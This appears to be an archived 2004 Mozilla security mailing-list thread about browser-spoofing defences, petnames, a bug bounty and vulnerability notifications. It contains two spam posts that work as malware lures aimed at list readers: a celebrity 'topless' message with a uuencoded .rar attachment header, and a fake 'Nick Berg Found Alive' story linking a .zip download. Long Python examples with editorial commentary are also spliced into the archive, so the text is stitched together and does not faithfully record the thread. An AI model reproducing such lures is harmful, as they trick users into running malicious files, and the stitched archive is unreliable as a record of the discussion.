Amir Herzberg | 2 Aug 2004 15:36

Re: [Fwd: more comments on the "protecting naive browsers" paper]

Ian Grigg wrote:

> Amir,
> 
> here are comments, not particularly well reviewed.
> 
> http://www.cs.biu.ac.il/~herzbea//Papers/ecommerce/spoofing.htm
Thanks!
> 
> Mozilla people (2nd try),
Please provide more comments...

Here are some responses to your comments:
> 
> Right, that idea.  A couple of things - it's called a petname
> which has a defined meaning, you can probably google for the
> defining paper.  It is a name that is explicitly not shared
> with the rest of the world, so it is distinct by definition
> with the nickname, which is shared.
I didn't find the definition and didn't quite understand the distinction 
you made.
> 
> SSL/TLS isn't used to confirm the public key.  
I think we use different terms here. When I say `confirm the public key` 
I simply mean `confirm that the site actually has the private key 
corresponding to this public key`. Nothing to do with certificates, CA 
etc.... usually done using SSL.
...
>> Existing web security mechanisms (SSL/TLS) may cause substantial 
>> overhead if applied to most web pages, as required for securing 
(Continue reading)

Frank Hecker | 2 Aug 2004 16:32

Re: Will Mozilla pay for Reports of Security Holes?

Adam Hauner wrote:
> Linuxworld.com [1] published the story "Mozilla To Pay for Reports of 
> Security Holes" (July 30) [2] with only this useful information:
> 
>   The year-old Mozilla Foundation, ..., is going to start paying
>   cash bounties to people who identify and report security issues
>   in its software.
> 
> No source is mentioned, no other info provided. Does anybody know 
> something more?

Yes. See

   http://www.mozilla.org/press/mozilla-2004-08-02.html

for more information on the new Mozilla Security Bug Bounty program.

Note that this program is completely independent of the Netscape bugs 
bounty program. (Although clearly the Mozilla program was inspired by 
the Netscape bugs bounty program).

Frank

-- 
Frank Hecker
hecker <at> hecker.org
sthompson | 4 Aug 2004 00:53

avril lavigne topless 4607

Avril Lavigne posing topless for FHM magazine

begin 644 C:\avril\Copy (4) of avrillavigne.rar

davidgrey | 4 Aug 2004 00:49

Nick Berg Found Alive

Conspiracy theories of Nick Berg being alive and well in Iraq have today been proven true.  Aljazeera have
released video footage of the supposedly beheaded American captive. The clip was first "discovered" on
an Islamic website in Malaysia and has now been released by American journalists collaborating with
Aljazeera.  The evidence speaks for itself and can be viewed firsthand here.  http://www.greentea.625.co.kr/NickBerg.zip
Ian Grigg | 4 Aug 2004 01:39

Re: more comments on the "protecting naive browsers" paper - petnames

Amir Herzberg wrote:

>> http://www.cs.biu.ac.il/~herzbea//Papers/ecommerce/spoofing.htm

>> Right, that idea.  A couple of things - it's called a petname
>> which has a defined meaning, you can probably google for the
>> defining paper.  It is a name that is explicitly not shared
>> with the rest of the world, so it is distinct by definition
>> with the nickname, which is shared.
> 
> I didn't find the definition and didn't quite understand the distinction 
> you made.

A petname is a private name that never leaves the
local domain.  I.e., the browser in this case.
In contrast, a nickname is shared.  So, for example
amazon.com is a nickname for IP# 207.171.163.90
because it is shared.  But if a petname were used,
I couldn't tell you that my petname for that IP#
was "amazing books".

Here are some URLs.  I'm not sure which of these is
the primary one:

http://zooko.com/distnames.html
http://www.erights.org/elib/capability/pnml.html

iang
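As an added illustration of the distinction Ian draws (and of the "confirm the site has the private key" step Amir described earlier in the thread), not code from the paper, from Mozilla or from either poster: a petname store that keys the user's private name on the site's public key rather than on the shared nickname. Keying on a SHA-256 of the key bytes, the constructed sample key bytes, and the chrome wording are all assumptions of this example; the TLS handshake is taken to have already proved possession of the key before `status_line` is called.

```python
"""Petname vs nickname (added example, not from the paper or the thread).

A nickname such as amazon.com is shared by everyone, so a lookalike
(arnazon.com) can reuse its look.  A petname is chosen by one user and
never leaves this browser, and here it is bound to the site's key, which
the TLS handshake is assumed to have already confirmed the site holds.
"""
import hashlib
from typing import Optional


def key_id(spki: bytes) -> str:
    """Local identifier for a site's public key: SHA-256 of the key bytes.
    Hypothetical choice; the thread does not say what a petname is keyed on."""
    return hashlib.sha256(spki).hexdigest()


class PetnameStore:
    """Maps a site's key to a user-chosen petname.  Lives only in this browser."""

    def __init__(self) -> None:
        self._petnames: dict[str, str] = {}

    def assign(self, spki: bytes, petname: str) -> None:
        self._petnames[key_id(spki)] = petname

    def lookup(self, spki: bytes) -> Optional[str]:
        return self._petnames.get(key_id(spki))

    def status_line(self, nickname: str, spki: bytes) -> str:
        """Text the chrome would show for a visit to `nickname` whose TLS
        handshake proved possession of the private key matching `spki`."""
        pet = self.lookup(spki)
        if pet is None:
            return f"UNRECOGNISED site: {nickname} (no petname for this key)"
        return f"{pet}  ({nickname})"


# Constructed sample keys: stand-ins for DER SubjectPublicKeyInfo bytes.
AMAZON_KEY = b"constructed-demo-key-amazon"
ATTACKER_KEY = b"constructed-demo-key-attacker"


def demo() -> list[str]:
    """Three visits: the genuine site, a lookalike nickname with its own key,
    and the genuine nickname presented with a key the user never named."""
    store = PetnameStore()
    store.assign(AMAZON_KEY, "amazing books")
    return [
        store.status_line("amazon.com", AMAZON_KEY),     # genuine visit
        store.status_line("arnazon.com", ATTACKER_KEY),  # lookalike nickname
        store.status_line("amazon.com", ATTACKER_KEY),   # right name, wrong key
    ]


if __name__ == "__main__":
    for line in demo():
        print(line)
```

Only the first visit shows the petname; the other two show the unrecognised-site text however convincing the nickname looks, because the petname was bound to the key, not to the name. A second user's store would hold a different (or no) petname for the same key, which is what makes it private rather than shared.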
Anders Olsson | 4 Aug 2004 20:16

Is there any way to get email notifications on new security bugs?

Hi. Just wondering if there is a way to get email notifications on new
security bugs? Microsoft has it. :)

(Yes, I know that MS has more security bugs than Mozilla, but that doesn't
mean that Mozilla should have worse end user service)

Also, the "known vulnerabilities" page is kinda hard to find, IMHO. Can't
you link to it from the support page or something?

/Anders
Chris Hofmann | 4 Aug 2004 20:41

Re: Is there any way to get email notifications on new security bugs?


Asa and I were just talking about an idea of turning the vulnerability 
page into an RSS feed.   That would allow users to get updates as soon 
as we posted anything new to the vulnerability list...  anyone have 
thoughts on this?

chris h.

Anders Olsson wrote:

>Hi. Just wondering if there is a way to get email notifications on new
>security bugs? Microsoft has it. :)
>
>(Yes, I know that MS has more security bugs than Mozilla, but that doesn't
>mean that Mozilla should have worse end user service)
>
>Also, the "known vulnerabilities" page is kinda hard to find, IMHO. Can't
>you link to it from the support page or something?
>
>/Anders
Michael Lefevre | 4 Aug 2004 21:38

Re: Is there any way to get email notifications on new security bugs?

On 2004-08-04, Chris Hofmann <chofmann <at> meer.net> wrote:
>
> Asa and I were just talking about an idea of turning the vulnerability 
> page into an RSS feed.   That would allow users to get updates as soon 
> as we posted anything new to the vulnerability list...  anyone have 
> thoughts on this?

Sounds neat in principle, but I'm not sure that really addresses the
issue.  There's not much point in having an RSS feed if the list is only
updated once every 6-9 months.  Even if it was updated in a timely fashion
after each release, that's still going to mean a pile of updates every few
months (unless there are lots of x.x.1/2/3 releases, but hopefully this
batch isn't going to become typical).

There's also not much point in having an RSS feed if you have to find it
by going to www.mozilla.org and "known vulnerabilities" into the search
engine box.  The new "security center" is currently linked from the news
item announcing it, but that link will drop off.  Would be good to link
the pages up.

AIUI, security problems are publicised after a release where they've been
fixed. So the security RSS feed will be pretty much in sync with the
release info that's already in the main mozilla.org RSS news feed.

Lots of people know and understand email.  Pretty much every organisation
and product out there has an email list you can sign up for.  The original
poster's request is one that comes up regularly - to get emailed news
about Mozilla.  I think what would be good is a mailing list of the main
mozilla.org news feed.

(Continue reading)

Adam Hauner | 5 Aug 2004 07:49

Re: Is there any way to get email notifications on new security bugs?

Chris Hofmann wrote:

> Asa and I were just talking about an idea of turning the vulnerability 
> page into an RSS feed.   That would allow users to get updates as soon 
> as we posted anything new to the vulnerability list...  anyone have 
> thoughts on this?

If Seamonkey will have an integrated RSS reader, why not. Otherwise I 
personally prefer e-mail...

-- 
Adam Hauner
Projekt CZilla
http://www.czilla.cz/
Florian Weimer | 5 Aug 2004 08:00

Re: Is there any way to get email notifications on new security bugs?

* Chris Hofmann:

> Asa and I were just talking about an idea of turning the vulnerability
> page into an RSS feed.   That would allow users to get updates as soon
> as we posted anything new to the vulnerability list...  anyone have
> thoughts on this?

Industry standard practice is notification by email.  Rather than
trying to be innovative, Mozilla should follow existing practice in
this area.
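Added example bridging the RSS-feed proposal and the preference for e-mail voiced in the replies; it is not Mozilla code, mozilla.org had no such feed at the time of the thread, and the feed contents, addresses and URLs are constructed for the demonstration. It polls a vulnerability-list RSS 2.0 feed, de-duplicates on `guid`, and turns each new item into an e-mail notice, with a `prime` step so a new subscriber is not sent the whole back catalogue on the first poll.

```python
# Added example (not Mozilla code): consume a vulnerability-list RSS 2.0 feed
# and turn each item not seen before into an e-mail notice.  The feed text is
# constructed sample data; mozilla.org had no such feed when this was written.
import xml.etree.ElementTree as ET  # for a feed fetched from the network, prefer defusedxml
from email.message import EmailMessage

SAMPLE_FEED = """<?xml version="1.0"?>
<rss version="2.0"><channel>
  <title>Known vulnerabilities (constructed sample)</title>
  <link>https://example.invalid/security/</link>
  <item>
    <title>Example advisory A</title>
    <link>https://example.invalid/security/a</link>
    <guid>https://example.invalid/security/a</guid>
    <description>Fixed in release 1.7.2 (constructed text)</description>
  </item>
  <item>
    <title>Example advisory B</title>
    <link>https://example.invalid/security/b</link>
    <guid>https://example.invalid/security/b</guid>
    <description>Fixed in release 1.7.2 (constructed text)</description>
  </item>
</channel></rss>
"""

# A later fetch of the same feed with one more item appended (constructed).
NEW_ITEM = """  <item>
    <title>Example advisory C</title>
    <link>https://example.invalid/security/c</link>
    <guid>https://example.invalid/security/c</guid>
    <description>Fixed in release 1.7.3 (constructed text)</description>
  </item>
"""
SAMPLE_FEED_UPDATED = SAMPLE_FEED.replace("</channel>", NEW_ITEM + "</channel>")


def parse_items(xml_text: str) -> list[dict]:
    """Return the feed's items as dicts.  Items with neither guid nor link are
    skipped: there is nothing stable to de-duplicate them on."""
    root = ET.fromstring(xml_text)
    items = []
    for node in root.iter("item"):
        guid = node.findtext("guid") or node.findtext("link")
        if not guid:
            continue
        items.append({
            "guid": guid.strip(),
            "title": (node.findtext("title") or "").strip(),
            "link": (node.findtext("link") or "").strip(),
            "description": (node.findtext("description") or "").strip(),
        })
    return items


class FeedWatcher:
    """Tracks which guids have already been announced.  A real poller would
    persist `seen` to disk between runs; here it lives in memory."""

    def __init__(self, recipients: list[str],
                 sender: str = "security-notify@example.invalid") -> None:
        self.recipients = recipients
        self.sender = sender
        self.seen: set[str] = set()

    def prime(self, xml_text: str) -> int:
        """Record the current items without mailing them, so a new subscriber
        is not flooded with the whole back catalogue.  Returns how many were added."""
        before = len(self.seen)
        self.seen.update(item["guid"] for item in parse_items(xml_text))
        return len(self.seen) - before

    def poll(self, xml_text: str) -> list[EmailMessage]:
        """Return one e-mail per item not announced before, in feed order,
        and mark each as seen."""
        notices = []
        for item in parse_items(xml_text):
            if item["guid"] in self.seen:
                continue
            self.seen.add(item["guid"])
            notices.append(self._notice(item))
        return notices

    def _notice(self, item: dict) -> EmailMessage:
        msg = EmailMessage()
        msg["Subject"] = f"[security] {item['title']}"
        msg["From"] = self.sender
        msg["To"] = ", ".join(self.recipients)
        msg.set_content(f"{item['title']}\n{item['link']}\n\n{item['description']}\n")
        return msg  # hand to smtplib.SMTP.send_message() in a real poller


if __name__ == "__main__":
    watcher = FeedWatcher(["subscriber@example.invalid"])
    for notice in watcher.poll(SAMPLE_FEED):
        print(notice["Subject"])
    print(len(watcher.poll(SAMPLE_FEED)), "new on re-poll")
    for notice in watcher.poll(SAMPLE_FEED_UPDATED):
        print(notice["Subject"])
```

The first poll yields two notices, a re-poll of the same feed yields none, and the updated feed yields exactly one for advisory C. Whatever the list's publishing cadence, the de-duplication means subscribers see each advisory once, and priming on subscription avoids the pile of old entries Michael worries about.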
